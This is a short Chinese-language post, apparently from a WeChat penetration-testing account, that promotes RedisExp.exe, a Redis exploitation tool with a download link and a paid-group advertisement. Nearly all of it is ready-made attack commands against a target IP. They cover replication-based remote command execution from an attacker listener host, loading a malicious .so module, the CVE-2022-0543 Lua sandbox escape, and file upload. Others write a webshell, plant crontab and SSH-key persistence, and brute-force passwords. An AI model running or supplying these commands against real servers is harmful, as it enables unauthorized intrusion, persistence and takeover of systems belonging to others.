0x01 工具介绍
Redis 漏洞利用工具。
0x02 安装与使用
常用命令:
主从复制命令执行:
RedisExp.exe -rhost
192.168
.211
.131
-lhost
192.168
.211
.1
-
exec
RedisExp.exe -rhost
192.168
.211
.131
-lhost
192.168
.211
.1
-
exec
-console
Linux:
RedisExp.exe -rhost
192.168
.211
.131
-lhost
192.168
.211
.1
-
exec
-so exp.so
RedisExp.exe -rhost
192.168
.211
.131
-lhost
192.168
.211
.1
-
exec
-console -so exp.so
主从复制文件上传:
RedisExp.exe -rhost
192.168
.211
.131
-lhost
192.168
.211
.1
-rfile dump.rdb -lfile dump.rdb -upload
主动关闭主从复制:
RedisExp.exe -rhost
192.168
.211
.131
-slaveof
Lua沙盒绕过命令执行 CVE
-2022
-0543
:
RedisExp.exe -rhost
192.168
.211
.131
-lua -console
备份写 Webshell:
RedisExp.exe -rhost
192.168
.211
.131
-shell
Linux 写计划任务:
RedisExp.exe -rhost
192.168
.211
.131
-crontab
Linux 写 SSH 公钥:
RedisExp.exe -rhost
192.168
.211
.131
-ssh
爆破 Redis 密码:
RedisExp.exe -rhost
192.168
.211
.131
-brute -pwdf ../
pass
.txt
执行 Redis 命令:
RedisExp.exe -rhost
192.168
.211
.131
-cli
翻到文章最底部点击“阅读原文”下载链接
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读
原文始发于微信公众号(渗透安全团队):Redis漏洞利用工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论